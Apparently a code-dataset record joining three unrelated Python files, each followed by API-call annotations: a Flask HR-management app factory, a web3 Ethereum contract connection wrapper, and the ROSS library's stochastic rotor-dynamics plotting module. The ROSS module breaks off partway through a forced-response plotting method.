4ec7f453fdae28d1a412d740849c9ee186757df8
# 初始化模块 from config import Config from flask import Flask from flask_sqlalchemy import SQLAlchemy # 数据库操作对象 db = SQLAlchemy() # 创建app def create_app(): # flask操作对象 app = Flask(__name__) # 通过配置文件读取并应用配置 app.config.from_object(Config) # 初始化数据库 db.init_app(app) # 员工管理子系统 from app.view import employee # 职位管理子系统 from app.view import post # 部门管理子系统 from app.view import department # 工资管理子系统 from app.view import salary # 考勤管理子系统 from app.view import attendance # 统一对外接口蓝本 app.register_blueprint(employee) app.register_blueprint(post) app.register_blueprint(department) app.register_blueprint(salary) app.register_blueprint(attendance) return app
[((114, 126), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', ([], {}), '()\n', (124, 126), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((181, 196), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (186, 196), False, 'from flask import Flask\n')]
NicolasMenendez/oracles-dashboard
listener/src/ethereum_connection.py
789e4a771c9f7064a19a85ef1b4f44bcbbac1a10
import json import web3 class EthereumConnection(): def __init__(self, url_node): self._url_node = url_node self._node_provider = web3.HTTPProvider(self._url_node) self._w3 = web3.Web3(self._node_provider) @property def w3(self): return self._w3 @property def url_node(self): return self._url_node class ContractConnection(): def __init__(self, eth_conn, contract_address, abi_path): self._eth_conn = eth_conn self._contract_address = self._eth_conn.w3.toChecksumAddress(contract_address) self._abi_path = abi_path self.__json_abi = self.__open_abi() self._contract = self._eth_conn.w3.eth.contract( address=self._contract_address, abi=self.__json_abi ) def __open_abi(self): return json.load(open(self._abi_path, "r")) @property def abi(self): return self.__json_abi @property def contract(self): return self._contract @property def address(self): return self._contract_address @property def eth(self): return self._contract.web3.eth @property def w3(self): return self._eth_conn.w3
[((152, 185), 'web3.HTTPProvider', 'web3.HTTPProvider', (['self._url_node'], {}), '(self._url_node)\n', (169, 185), False, 'import web3\n'), ((205, 235), 'web3.Web3', 'web3.Web3', (['self._node_provider'], {}), '(self._node_provider)\n', (214, 235), False, 'import web3\n')]
JuliaMota/ross
ross/stochastic/st_results.py
88c2fa69d9a583dcdc33eab8deb35c797ebf4ef8
"""STOCHASTIC ROSS plotting module. This module returns graphs for each type of analyses in st_rotor_assembly.py. """ import numpy as np from plotly import express as px from plotly import graph_objects as go from plotly import io as pio from plotly.subplots import make_subplots from ross.plotly_theme import tableau_colors pio.renderers.default = "browser" # set Plotly palette of colors colors1 = px.colors.qualitative.Dark24 colors2 = px.colors.qualitative.Light24 class ST_CampbellResults: """Store stochastic results and provide plots for Campbell Diagram. It's possible to visualize multiples harmonics in a single plot to check other speeds which also excite a specific natural frequency. Two options for plooting are available: Matplotlib and Bokeh. The user chooses between them using the attribute plot_type. The default is bokeh Parameters ---------- speed_range : array Array with the speed range in rad/s. wd : array Array with the damped natural frequencies log_dec : array Array with the Logarithmic decrement Returns ------- subplots : Plotly graph_objects.make_subplots() Plotly figure with diagrams for frequency and log dec. """ def __init__(self, speed_range, wd, log_dec): self.speed_range = speed_range self.wd = wd self.log_dec = log_dec def plot_nat_freq(self, percentile=[], conf_interval=[], harmonics=[1], **kwargs): """Plot the damped natural frequencies vs frequency. Parameters ---------- percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. harmonics: list, optional List withe the harmonics to be plotted. The default is to plot 1x. kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. """ default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) for k, v in default_values.items(): kwargs.setdefault(k, v) fig = go.Figure() x = np.concatenate((self.speed_range, self.speed_range[::-1])) for j, h in enumerate(harmonics): fig.add_trace( go.Scatter( x=self.speed_range, y=self.speed_range * h, opacity=1.0, name="{}x speed".format(h), line=dict(width=3, color=colors1[j], dash="dashdot"), legendgroup="speed{}".format(j), hovertemplate=("Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}"), **kwargs, ) ) for j in range(self.wd.shape[0]): fig.add_trace( go.Scatter( x=self.speed_range, y=np.mean(self.wd[j], axis=1), opacity=1.0, name="Mean - Mode {}".format(j + 1), line=dict(width=3, color=colors1[j]), legendgroup="mean{}".format(j), hovertemplate=("Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}"), **kwargs, ) ) for i, p in enumerate(percentile): fig.add_trace( go.Scatter( x=self.speed_range, y=np.percentile(self.wd[j], p, axis=1), opacity=0.6, line=dict(width=2.5, color=colors2[j]), name="percentile: {}%".format(p), legendgroup="percentile{}{}".format(j, i), hovertemplate=( "Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}" ), **kwargs, ) ) for i, p in enumerate(conf_interval): p1 = np.percentile(self.wd[j], 50 + p / 2, axis=1) p2 = np.percentile(self.wd[j], 50 - p / 2, axis=1) fig.add_trace( go.Scatter( x=x, y=np.concatenate((p1, p2[::-1])), line=dict(width=1, color=colors1[j]), fill="toself", fillcolor=colors1[j], opacity=0.3, name="confidence interval: {}% - Mode {}".format(p, j + 1), legendgroup="conf{}{}".format(j, i), hovertemplate=( "Frequency: %{x:.3f}<br>" + "Frequency: %{y:.3f}" ), **kwargs, ) ) fig.update_xaxes( title_text="<b>Rotor speed</b>", title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_yaxes( title_text="<b>Damped Natural Frequencies</b>", title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_layout( width=1200, height=900, plot_bgcolor="white", legend=dict( font=dict(family="sans-serif", size=14), bgcolor="white", bordercolor="black", borderwidth=2, ), ) return fig def plot_log_dec(self, percentile=[], conf_interval=[], harmonics=[1], **kwargs): """Plot the log_dec vs frequency. Parameters ---------- percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. harmonics: list, optional List withe the harmonics to be plotted. The default is to plot 1x. kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. """ default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) for k, v in default_values.items(): kwargs.setdefault(k, v) fig = go.Figure() x = np.concatenate((self.speed_range, self.speed_range[::-1])) for j in range(self.log_dec.shape[0]): fig.add_trace( go.Scatter( x=self.speed_range, y=np.mean(self.log_dec[j], axis=1), opacity=1.0, name="Mean - Mode {}".format(j + 1), line=dict(width=3, color=colors1[j]), legendgroup="mean{}".format(j), hovertemplate=("Frequency: %{x:.3f}<br>" + "Log Dec: %{y:.3f}"), **kwargs, ) ) for i, p in enumerate(percentile): fig.add_trace( go.Scatter( x=self.speed_range, y=np.percentile(self.log_dec[j], p, axis=1), opacity=0.6, line=dict(width=2.5, color=colors2[j]), name="percentile: {}%".format(p), legendgroup="percentile{}{}".format(j, i), hoverinfo="none", **kwargs, ) ) for i, p in enumerate(conf_interval): p1 = np.percentile(self.log_dec[j], 50 + p / 2, axis=1) p2 = np.percentile(self.log_dec[j], 50 - p / 2, axis=1) fig.add_trace( go.Scatter( x=x, y=np.concatenate((p1, p2[::-1])), line=dict(width=1, color=colors1[j]), fill="toself", fillcolor=colors1[j], opacity=0.3, name="confidence interval: {}% - Mode {}".format(p, j + 1), legendgroup="conf{}{}".format(j, i), hoverinfo="none", **kwargs, ) ) fig.update_xaxes( title_text="<b>Rotor speed</b>", title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_yaxes( title_text="<b>Logarithmic decrement</b>", title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_layout( plot_bgcolor="white", width=1200, height=900, legend=dict( font=dict(family="sans-serif", size=14), bgcolor="white", bordercolor="black", borderwidth=2, ), ) return fig def plot(self, percentile=[], conf_interval=[], *args, **kwargs): """Plot Campbell Diagram. This method plots Campbell Diagram. Parameters ---------- percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. args: optional harmonics : list, optional List with the harmonics to be plotted. The default is to plot 1x. kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- subplots : Plotly graph_objects.make_subplots() Plotly figure with diagrams for frequency and log dec. """ fig0 = self.plot_nat_freq(percentile, conf_interval, *args, **kwargs) default_values = dict(showlegend=False) for k, v in default_values.items(): kwargs.setdefault(k, v) fig1 = self.plot_log_dec(percentile, conf_interval, *args, **kwargs) subplots = make_subplots(rows=1, cols=2) for data in fig0["data"]: subplots.add_trace(data, 1, 1) for data in fig1["data"]: subplots.add_trace(data, 1, 2) subplots.update_xaxes(fig0.layout.xaxis, row=1, col=1) subplots.update_yaxes(fig1.layout.yaxis, row=1, col=1) subplots.update_xaxes(fig0.layout.xaxis, row=1, col=2) subplots.update_yaxes(fig1.layout.yaxis, row=1, col=2) subplots.update_layout( plot_bgcolor="white", width=1800, height=900, legend=dict( font=dict(family="sans-serif", size=14), bgcolor="white", bordercolor="black", borderwidth=2, ), ) return subplots class ST_FrequencyResponseResults: """Store stochastic results and provide plots for Frequency Response. Parameters ---------- speed_range : array Array with the speed range in rad/s. magnitude : array Array with the frequencies, magnitude (dB) of the frequency response for each pair input/output. phase : array Array with the frequencies, phase of the frequency response for each pair input/output. Returns ------- subplots : Plotly graph_objects.make_subplots() Plotly figure with amplitude vs frequency phase angle vs frequency. """ def __init__(self, speed_range, magnitude, phase): self.speed_range = speed_range self.magnitude = magnitude self.phase = phase def plot_magnitude( self, percentile=[], conf_interval=[], units="mic-pk-pk", **kwargs, ): """Plot amplitude vs frequency. This method plots the frequency response magnitude given an output and an input using Plotly. Parameters ---------- percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0% and 100% inclusive. units : str, optional Unit system Default is "mic-pk-pk". kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. """ if units == "m": y_axis_label = "<b>Amplitude (m)</b>" elif units == "mic-pk-pk": y_axis_label = "<b>Amplitude (μ pk-pk)</b>" else: y_axis_label = "<b>Amplitude (dB)</b>" default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) for k, v in default_values.items(): kwargs.setdefault(k, v) fig = go.Figure() fig.add_trace( go.Scatter( x=self.speed_range, y=np.mean(self.magnitude, axis=1), opacity=1.0, name="Mean", line=dict(width=3, color="black"), legendgroup="mean", hovertemplate=("Frequency: %{x:.2f}<br>" + "Amplitude: %{y:.2e}"), **kwargs, ) ) for i, p in enumerate(percentile): fig.add_trace( go.Scatter( x=self.speed_range, y=np.percentile(self.magnitude, p, axis=1), opacity=0.6, line=dict(width=2.5, color=colors2[i]), name="percentile: {}%".format(p), legendgroup="percentile{}".format(i), hovertemplate=("Frequency: %{x:.2f}<br>" + "Amplitude: %{y:.2e}"), **kwargs, ) ) x = np.concatenate((self.speed_range, self.speed_range[::-1])) for i, p in enumerate(conf_interval): p1 = np.percentile(self.magnitude, 50 + p / 2, axis=1) p2 = np.percentile(self.magnitude, 50 - p / 2, axis=1) fig.add_trace( go.Scatter( x=x, y=np.concatenate((p1, p2[::-1])), line=dict(width=1, color=colors1[i]), fill="toself", fillcolor=colors1[i], opacity=0.5, name="confidence interval: {}%".format(p), legendgroup="conf{}".format(i), hovertemplate=("Frequency: %{x:.2f}<br>" + "Amplitude: %{y:.2e}"), **kwargs, ) ) fig.update_xaxes( title_text="<b>Frequency</b>", title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_yaxes( title_text=y_axis_label, title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_layout( plot_bgcolor="white", width=1200, height=900, legend=dict( font=dict(family="sans-serif", size=14), bgcolor="white", bordercolor="black", borderwidth=2, ), ) return fig def plot_phase(self, percentile=[], conf_interval=[], **kwargs): """Plot phase angle response. This method plots the phase response given an output and an input using bokeh. Parameters ---------- percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. """ default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) for k, v in default_values.items(): kwargs.setdefault(k, v) fig = go.Figure() fig.add_trace( go.Scatter( x=self.speed_range, y=np.mean(self.phase, axis=1), opacity=1.0, name="Mean", line=dict(width=3, color="black"), legendgroup="mean", hovertemplate=("Frequency: %{x:.2f}<br>" + "Phase: %{y:.2f}"), **kwargs, ) ) for i, p in enumerate(percentile): fig.add_trace( go.Scatter( x=self.speed_range, y=np.percentile(self.phase, p, axis=1), opacity=0.6, line=dict(width=2.5, color=colors2[i]), name="percentile: {}%".format(p), legendgroup="percentile{}".format(i), hovertemplate=("Frequency: %{x:.2f}<br>" + "Phase: %{y:.2f}"), **kwargs, ) ) x = np.concatenate((self.speed_range, self.speed_range[::-1])) for i, p in enumerate(conf_interval): p1 = np.percentile(self.phase, 50 + p / 2, axis=1) p2 = np.percentile(self.phase, 50 - p / 2, axis=1) fig.add_trace( go.Scatter( x=x, y=np.concatenate((p1, p2[::-1])), line=dict(width=1, color=colors1[i]), fill="toself", fillcolor=colors1[i], opacity=0.5, name="confidence interval: {}%".format(p), legendgroup="conf{}".format(i), hovertemplate=("Frequency: %{x:.2f}<br>" + "Phase: %{y:.2f}"), **kwargs, ) ) fig.update_xaxes( title_text="<b>Frequency</b>", title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_yaxes( title_text="<b>Phase Angle</b>", title_font=dict(family="Arial", size=20), tickfont=dict(size=16), gridcolor="lightgray", showline=True, linewidth=2.5, linecolor="black", mirror=True, ) fig.update_layout( plot_bgcolor="white", width=1200, height=900, legend=dict( font=dict(family="sans-serif", size=14), bgcolor="white", bordercolor="black", borderwidth=2, ), ) return fig def plot_polar_bode( self, percentile=[], conf_interval=[], units="mic-pk-pk", **kwargs, ): """Plot polar forced response using Plotly. Parameters ---------- dof : int Degree of freedom. units : str Magnitude unit system. Default is "mic-pk-pk" polar_kwargs : optional Additional key word arguments can be passed to change the plot layout only (e.g. width=1000, height=800, ...). *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. """ default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) if units == "m": r_axis_label = "<b>Amplitude (m)</b>" elif units == "mic-pk-pk": r_axis_label = "<b>Amplitude (μ pk-pk)</b>" else: r_axis_label = "<b>Amplitude (dB)</b>" for k, v in default_values.items(): kwargs.setdefault(k, v) fig = go.Figure() fig.add_trace( go.Scatterpolar( r=np.mean(self.magnitude, axis=1), theta=np.mean(self.phase, axis=1), customdata=self.speed_range, thetaunit="radians", line=dict(width=3.0, color="black"), name="Mean", legendgroup="mean", hovertemplate=( "<b>Amplitude: %{r:.2e}</b><br>" + "<b>Phase: %{theta:.2f}</b><br>" + "<b>Frequency: %{customdata:.2f}</b>" ), **kwargs, ) ) for i, p in enumerate(percentile): fig.add_trace( go.Scatterpolar( r=np.percentile(self.magnitude, p, axis=1), theta=np.percentile(self.phase, p, axis=1), customdata=self.speed_range, thetaunit="radians", opacity=0.6, line=dict(width=2.5, color=colors2[i]), name="percentile: {}%".format(p), legendgroup="percentile{}".format(i), hovertemplate=( "<b>Amplitude: %{r:.2e}</b><br>" + "<b>Phase: %{theta:.2f}</b><br>" + "<b>Frequency: %{customdata:.2f}</b>" ), **kwargs, ) ) for i, p in enumerate(conf_interval): p1 = np.percentile(self.magnitude, 50 + p / 2, axis=1) p2 = np.percentile(self.magnitude, 50 - p / 2, axis=1) p3 = np.percentile(self.phase, 50 + p / 2, axis=1) p4 = np.percentile(self.phase, 50 - p / 2, axis=1) fig.add_trace( go.Scatterpolar( r=np.concatenate((p1, p2[::-1])), theta=np.concatenate((p3, p4[::-1])), thetaunit="radians", line=dict(width=1, color=colors1[i]), fill="toself", fillcolor=colors1[i], opacity=0.5, name="confidence interval: {}%".format(p), legendgroup="conf{}".format(i), **kwargs, ) ) fig.update_layout( polar=dict( radialaxis=dict( title_text=r_axis_label, title_font=dict(family="Arial", size=14), gridcolor="lightgray", exponentformat="power", ), angularaxis=dict( tickfont=dict(size=14), gridcolor="lightgray", linecolor="black", linewidth=2.5, ), ), ) return fig def plot(self, percentile=[], conf_interval=[], units="mic-pk-pk", **kwargs): """Plot frequency response. This method plots the frequency and phase response given an output and an input. Parameters ---------- percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. units : str, optional Unit system Default is "mic-pk-pk" kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- subplots : Plotly graph_objects.make_subplots() Plotly figure with amplitude vs frequency phase angle vs frequency. """ fig0 = self.plot_magnitude(percentile, conf_interval, units, **kwargs) default_values = dict(showlegend=False) for k, v in default_values.items(): kwargs.setdefault(k, v) fig1 = self.plot_phase(percentile, conf_interval, **kwargs) fig2 = self.plot_polar_bode(percentile, conf_interval, units, **kwargs) subplots = make_subplots( rows=2, cols=2, specs=[[{}, {"type": "polar", "rowspan": 2}], [{}, None]] ) for data in fig0["data"]: subplots.add_trace(data, row=1, col=1) for data in fig1["data"]: subplots.add_trace(data, row=2, col=1) for data in fig2["data"]: subplots.add_trace(data, row=1, col=2) subplots.update_xaxes(fig0.layout.xaxis, row=1, col=1) subplots.update_yaxes(fig0.layout.yaxis, row=1, col=1) subplots.update_xaxes(fig1.layout.xaxis, row=2, col=1) subplots.update_yaxes(fig1.layout.yaxis, row=2, col=1) subplots.update_layout( plot_bgcolor="white", polar_bgcolor="white", width=1800, height=900, polar=dict( radialaxis=fig2.layout.polar.radialaxis, angularaxis=fig2.layout.polar.angularaxis, ), legend=dict( font=dict(family="sans-serif", size=14), bgcolor="white", bordercolor="black", borderwidth=2, ), ) return subplots class ST_TimeResponseResults: """Store stochastic results and provide plots for Time Response and Orbit Response. Parameters ---------- time_range : 1-dimensional array Time array. yout : array System response. xout : array Time evolution of the state vector. nodes_list: array list with nodes from a rotor model. nodes_pos: array Rotor nodes axial positions. number_dof : int Number of degrees of freedom per shaft element's node Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. """ def __init__(self, time_range, yout, xout, number_dof, nodes_list, nodes_pos): self.time_range = time_range self.yout = yout self.xout = xout self.nodes_list = nodes_list self.nodes_pos = nodes_pos self.number_dof = number_dof def plot_1d( self, probe, percentile=[], conf_interval=[], fig=None, *args, **kwargs ): """Plot time response. This method plots the time response given a tuple of probes with their nodes and orientations. Parameters ---------- probe : list of tuples List with tuples (node, orientation angle). node : int indicate the node where the probe is located. orientation : float, probe orientation angle about the shaft. The 0 refers to +X direction. percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. fig : Plotly graph_objects.Figure() The figure object with the plot. args : optional Additional plot axes kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. """ if fig is None: fig = go.Figure() default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) for k, v in default_values.items(): kwargs.setdefault(k, v) for i, p in enumerate(probe): dofx = p[0] * self.number_dof dofy = p[0] * self.number_dof + 1 angle = p[1] # fmt: off operator = np.array( [[np.cos(angle), - np.sin(angle)], [np.cos(angle), + np.sin(angle)]] ) probe_resp = np.zeros_like(self.yout[:, :, 0]) for j, y in enumerate(self.yout): _probe_resp = operator @ np.vstack((y[:, dofx], y[:, dofy])) probe_resp[j] = ( _probe_resp[0] * np.cos(angle) ** 2 + _probe_resp[1] * np.sin(angle) ** 2 ) # fmt: on fig.add_trace( go.Scatter( x=self.time_range, y=np.mean(probe_resp, axis=0), opacity=1.0, name=f"Probe {i + 1} - Mean", line=dict(width=3.0), hovertemplate=("Time: %{x:.3f}<br>" + "Amplitude: %{y:.2e}"), **kwargs, ) ) for j, p in enumerate(percentile): fig.add_trace( go.Scatter( x=self.time_range, y=np.percentile(probe_resp, p, axis=0), opacity=0.6, line=dict(width=2.5), name=f"Probe {i + 1} - percentile: {p}%", hovertemplate=("Time: %{x:.3f}<br>" + "Amplitude: %{y:.2e}"), **kwargs, ) ) x = np.concatenate((self.time_range, self.time_range[::-1])) for j, p in enumerate(conf_interval): p1 = np.percentile(probe_resp, 50 + p / 2, axis=0) p2 = np.percentile(probe_resp, 50 - p / 2, axis=0) fig.add_trace( go.Scatter( x=x, y=np.concatenate((p1, p2[::-1])), line=dict(width=1), fill="toself", fillcolor=colors1[j], opacity=0.5, name=f"Probe {i + 1} - confidence interval: {p}%", hovertemplate=("Time: %{x:.3f}<br>" + "Amplitude: %{y:.2e}"), **kwargs, ) ) fig.update_xaxes(title_text="<b>Time (s)</b>") fig.update_yaxes(title_text="<b>Amplitude</b>") return fig def plot_2d(self, node, percentile=[], conf_interval=[], fig=None, *args, **kwargs): """Plot orbit response (2D). This function plots orbits for a given node on the rotor system in a 2D view. Parameters ---------- node : int Select the node to display the respective orbit response. percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. fig : Plotly graph_objects.Figure() The figure object with the plot. args : optional Additional plot axes kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. """ ndof = self.number_dof default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) for k, v in default_values.items(): kwargs.setdefault(k, v) if fig is None: fig = go.Figure() fig.add_trace( go.Scatter( x=np.mean(self.yout[..., ndof * node], axis=0), y=np.mean(self.yout[..., ndof * node + 1], axis=0), opacity=1.0, name="Mean", line=dict(width=3, color="black"), hovertemplate=( "X - Amplitude: %{x:.2e}<br>" + "Y - Amplitude: %{y:.2e}" ), **kwargs, ) ) for i, p in enumerate(percentile): fig.add_trace( go.Scatter( x=np.percentile(self.yout[..., ndof * node], p, axis=0), y=np.percentile(self.yout[..., ndof * node + 1], p, axis=0), opacity=0.6, line=dict(width=2.5, color=colors2[i]), name="percentile: {}%".format(p), hovertemplate=( "X - Amplitude: %{x:.2e}<br>" + "Y - Amplitude: %{y:.2e}" ), **kwargs, ) ) for i, p in enumerate(conf_interval): p1 = np.percentile(self.yout[..., ndof * node], 50 + p / 2, axis=0) p2 = np.percentile(self.yout[..., ndof * node], 50 - p / 2, axis=0) p3 = np.percentile(self.yout[..., ndof * node + 1], 50 + p / 2, axis=0) p4 = np.percentile(self.yout[..., ndof * node + 1], 50 - p / 2, axis=0) fig.add_trace( go.Scatter( x=np.concatenate((p1, p2[::-1])), y=np.concatenate((p3, p4[::-1])), line=dict(width=1, color=colors1[i]), fill="toself", fillcolor=colors1[i], opacity=0.5, name="confidence interval: {}%".format(p), hovertemplate=( "X - Amplitude: %{x:.2e}<br>" + "Y - Amplitude: %{y:.2e}" ), **kwargs, ) ) fig.update_xaxes(title_text="<b>Amplitude</b>") fig.update_yaxes(title_text="<b>Amplitude</b>") fig.update_layout(title="<b>Rotor Orbit: node {}</b>".format(node)), return fig def plot_3d(self, percentile=[], conf_interval=[], fig=None, *args, **kwargs): """Plot orbit response (3D). This function plots orbits for each node on the rotor system in a 3D view. Parameters ---------- percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. fig : Plotly graph_objects.Figure() The figure object with the plot. args : optional Additional plot axes kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. """ ndof = self.number_dof default_values = dict(mode="lines") conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) for k, v in default_values.items(): kwargs.setdefault(k, v) if fig is None: fig = go.Figure() line = np.zeros(len(self.nodes_pos)) fig.add_trace( go.Scatter3d( x=self.nodes_pos, y=line, z=line, line=dict(width=2.0, color="black", dash="dashdot"), showlegend=False, mode="lines", ) ) for j, n in enumerate(self.nodes_list): x = np.ones(self.yout.shape[1]) * self.nodes_pos[n] fig.add_trace( go.Scatter3d( x=x, y=np.mean(self.yout[..., ndof * n], axis=0), z=np.mean(self.yout[..., ndof * n + 1], axis=0), line=dict(width=5, color="black"), name="Mean", legendgroup="mean", showlegend=True if j == 0 else False, hovertemplate=( "Nodal Position: %{x:.2f}<br>" + "X - Amplitude: %{y:.2e}<br>" + "Y - Amplitude: %{z:.2e}" ), **kwargs, ) ) for i, p in enumerate(percentile): fig.add_trace( go.Scatter3d( x=x, y=np.percentile(self.yout[..., ndof * n], p, axis=0), z=np.percentile(self.yout[..., ndof * n + 1], p, axis=0), opacity=1.0, name="percentile: {}%".format(p), line=dict(width=3, color=colors1[i]), legendgroup="perc{}".format(p), showlegend=True if j == 0 else False, hovertemplate=( "Nodal Position: %{x:.2f}<br>" + "X - Amplitude: %{y:.2e}<br>" + "Y - Amplitude: %{z:.2e}" ), **kwargs, ) ) for i, p in enumerate(conf_interval): fig.add_trace( go.Scatter3d( x=x, y=np.percentile(self.yout[..., ndof * n], 50 + p / 2, axis=0), z=np.percentile( self.yout[..., ndof * n + 1], 50 + p / 2, axis=0 ), line=dict(width=3.5, color=colors1[i]), opacity=0.6, name="confidence interval: {}%".format(p), legendgroup="conf_interval{}".format(p), showlegend=True if j == 0 else False, hovertemplate=( "Nodal Position: %{x:.2f}<br>" + "X - Amplitude: %{y:.2e}<br>" + "Y - Amplitude: %{z:.2e}" ), **kwargs, ) ) fig.add_trace( go.Scatter3d( x=x, y=np.percentile(self.yout[..., ndof * n], 50 - p / 2, axis=0), z=np.percentile( self.yout[..., ndof * n + 1], 50 - p / 2, axis=0 ), line=dict(width=3.5, color=colors1[i]), opacity=0.6, name="confidence interval: {}%".format(p), legendgroup="conf_interval{}".format(p), showlegend=False, hovertemplate=( "Nodal Position: %{x:.2f}<br>" + "X - Amplitude: %{y:.2e}<br>" + "Y - Amplitude: %{z:.2e}" ), **kwargs, ) ) fig.update_layout( scene=dict( xaxis=dict(title=dict(text="<b>Rotor Length</b>"), showspikes=False), yaxis=dict(title=dict(text="<b>Amplitude - X</b>"), showspikes=False), zaxis=dict(title=dict(text="<b>Amplitude - Y</b>"), showspikes=False), ), ) return fig class ST_ForcedResponseResults: """Store stochastic results and provide plots for Forced Response. Parameters ---------- force_resp : array Array with the force response for each node for each frequency. frequency_range : array Array with the frequencies. magnitude : array Magnitude of the frequency response for node for each frequency. phase : array Phase of the frequency response for node for each frequency. number_dof = int Number of degrees of freedom per shaft element's node. Returns ------- subplots : Plotly graph_objects.make_subplots() Plotly figure with amplitude vs frequency phase angle vs frequency. """ def __init__(self, forced_resp, magnitude, phase, frequency_range, number_dof): self.forced_resp = forced_resp self.magnitude = magnitude self.phase = phase self.frequency_range = frequency_range self.number_dof = number_dof def plot_magnitude( self, probe, percentile=[], conf_interval=[], fig=None, units="mic-pk-pk", **kwargs, ): """Plot frequency response. This method plots the unbalance response magnitude. Parameters ---------- probe : list of tuples List with tuples (node, orientation angle). node : int indicate the node where the probe is located. orientation : float, probe orientation angle about the shaft. The 0 refers to +X direction. percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0% and 100% inclusive. fig : Plotly graph_objects.Figure() The figure object with the plot. units : str, optional Unit system Default is "mic-pk-pk". kwargs : optional Additional key word arguments can be passed to change the plot layout (e.g. width=800, height=600, ...). *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() Bokeh plot axes with magnitude plot. """ if units == "m": y_axis_label = "<b>Amplitude (m)</b>" elif units == "mic-pk-pk": y_axis_label = "<b>Amplitude (μ pk-pk)</b>" else: y_axis_label = "<b>Amplitude (dB)</b>" conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) if fig is None: fig = go.Figure() color_i = 0 color_p = 0 for i, p in enumerate(probe): dofx = p[0] * 